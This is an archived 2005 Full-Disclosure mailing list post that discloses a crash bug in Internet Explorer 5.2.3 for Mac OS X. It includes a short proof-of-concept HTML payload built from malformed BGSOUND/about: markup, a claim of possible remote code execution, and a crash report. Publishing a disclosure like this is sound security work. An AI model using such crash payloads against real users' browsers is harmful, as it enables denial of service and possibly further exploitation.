[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
- From: "Marco Mella" <marco.mella@xxxxxxxxxxxxxxxx>
- Date: Thu, 22 Sep 2005 14:16:11 +0200
<HTML><BODY style="word-wrap: break-word; -khtml-nbsp-mode: space;
-khtml-line-break: after-white-space; "><SPAN><DIV><BR
class="khtml-block-placeholder"></DIV><DIV>In attach a POC of IE 5.2.3
Browser.</DIV><DIV><BR class="khtml-block-placeholder"></DIV><DIV><BR
class="khtml-block-placeholder"></DIV></SPAN><DIV><FONT size=2><FONT
face="Courier
New">--------------------------------------------------------------------<BR>CONFIDENTIALITY
NOTICE<BR>This message and its attachments are addressed solely to the
persons<BR>above and may contain confidential information. If you have
received<BR>the message in error, be informed that any use of the content
hereof<BR>is prohibited. Please return it immediately to the sender and
delete<BR>the message. Should you have any questions, please contact us
by<BR>replying to </FONT><A href="mailto:webmaster@xxxxxxxxxxxxxxxx";><FONT
face="Courier New">webmaster@xxxxxxxxxxxxxxxx</FONT></A><FONT
face="Courier New">.<BR> Thank
you<BR>
</FONT><A href="http://www.telecomitalia.it";><FONT
face="Courier New">www.telecomitalia.it</FONT></A><BR><FONT
face="Courier
New">--------------------------------------------------------------------</FONT></FONT></DIV></BODY></HTML>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd";>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<title></title>
<meta name="Generator" content="Cocoa HTML Writer">
<meta name="CocoaVersion" content="824.11">
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica}
</style>
</head>
<body>
<p class="p1"><HTML> <HEAD></p>
<p class="p1"><TABLE</p>
<p class="p1">><BGSOUND</p>
<p class="p1">about:file"" SRC=about:""</p>
<p class="p1">></p>
</body>
</html>
<HTML><BODY style="word-wrap: break-word; -khtml-nbsp-mode: space;
-khtml-line-break: after-white-space; "><SPAN></SPAN><DIV><BR><DIV><DIV>On
22/set/05, at 14:03, Marco Mella wrote:</DIV><BR
class="Apple-interchange-newline"><BLOCKQUOTE type="cite"><DIV> </DIV>Microsoft
IE 5.2.3 is the last IE browser released for Mac OSX.<BR>IE 5.2.3 contain a
vulnerability that allow a remote attacker to <BR>crash the browser an
potetially remote code execution.<BR><BR>A remote attacker could setup a
malicious site and entice a victim to<BR>visit it triggering the buffer
overflow.<BR><BR>Exploit tested on Tiger and Panther.<BR><BR>Sample of POC
(save on file and open with IE to test
locally)<BR>------------------------------------------------------------------------
<BR>---------<BR>Begin code------<BR><BR> <BR> >about:file""
SRC=about:""<BR> ><BR><BR>End of code-------<BR><BR><BR>Apple Crash
Report<BR>---------------------------<BR>OS Version: 10.4.2 (Build
8C46)<BR>Report Version: 3<BR><BR>Command: Internet Explorer<BR>Path:
/Applications/Internet Explorer.app/Contents/MacOS/Internet
<BR>Explorer<BR>Parent: WindowServer [65]<BR><BR>Version: 5.2.3
(5.2.3)<BR>Build Version: 30<BR>Project Name: MicrosoftIE5<BR>Source
Version: 58150100<BR><BR>PID: 854<BR>Thread: 7<BR><BR>Exception:
EXC_BAD_ACCESS (0x0001)<BR>Codes: KERN_PROTECTION_FAILURE (0x0002) at
0x000002e4<BR><BR>Thread 0:<BR>0 libSystem.B.dylib
0x9000a778 mach_msg_trap + 8<BR>1 libSystem.B.dylib
0x9000a6bc mach_msg + 60<BR>2 ...ple.CoreServices.CarbonCore 0x90b661e4
SwitchContexts + 96<BR>3 ...ple.CoreServices.CarbonCore 0x90b5be90
YieldToThread +
372<BR>.....<BR>snip----<BR><BR>Regards,<BR>Marco<BR><BR><BR><BR><BR><DIV><FONT
size="2"><FONT face="Courier
New">--------------------------------------------------------------------<BR>CONFIDENTIALITY
NOTICE<BR>This message and its attachments are addressed solely to the
persons<BR>above and may contain confidential information. If you have
received<BR>the message in error, be informed that any use of the content
hereof<BR>is prohibited. Please return it immediately to the sender and
delete<BR>the message. Should you have any questions, please contact us
by<BR>replying to </FONT><A href="mailto:webmaster@xxxxxxxxxxxxxxxx";><FONT
face="Courier New">webmaster@xxxxxxxxxxxxxxxx</FONT></A><FONT face="Courier
New">.<BR> Thank you<BR>
</FONT><A href="http://www.telecomitalia.it";><FONT face="Courier
New">www.telecomitalia.it</FONT></A><BR><FONT face="Courier
New">--------------------------------------------------------------------</FONT></FONT></DIV><DIV
style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left:
0px; ">_______________________________________________</DIV><DIV
style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left:
0px; ">Full-Disclosure - We believe in it.</DIV><DIV style="margin-top: 0px;
margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">Charter: <A
href="http://lists.grok.org.uk/full-disclosure-charter.html";>http://lists.grok.org.uk/full-disclosure-charter.html</A></DIV><DIV
style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left:
0px; ">Hosted and sponsored by Secunia - <A
href="http://secunia.com";>http://secunia.com</A>/</DIV>
</BLOCKQUOTE></DIV><BR></DIV></BODY></HTML>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/